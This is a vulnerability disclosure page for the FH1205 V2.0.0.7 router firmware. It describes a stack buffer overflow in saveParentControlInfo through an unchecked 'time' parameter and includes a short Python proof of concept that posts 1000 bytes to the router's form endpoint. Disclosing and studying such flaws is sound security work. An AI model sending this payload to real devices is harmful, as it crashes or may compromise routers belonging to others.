Skip to content

Latest commit

 

History

History
38 lines (23 loc) · 1.27 KB

saveParentControlInfo_time.md

File metadata and controls

38 lines (23 loc) · 1.27 KB

Overview

Affected version

FH1205 V2.0.0.7(775)

Vulnerability details

The function saveParentControlInfo contains a stack-based buffer overflow vulnerability.

image-20240319223137445

it reads in a user-provided parameter time, and the variable is passed to the function without any length check, which may lead to overflow of the stack-based buffer.

image-20240319223102122

As a result, by requesting the page, an attacker can easily execute a denial of service attack or remote code execution with carefully crafted overflow data.

image-20240319223110983

POC

import requests
from pwn import*

ip = "192.168.84.101"
url = "http://" + ip + "/goform/saveParentControlInfo"
payload = b"a"*1000

data = {"time": payload}
response = requests.post(url, data=data)
print(response.text)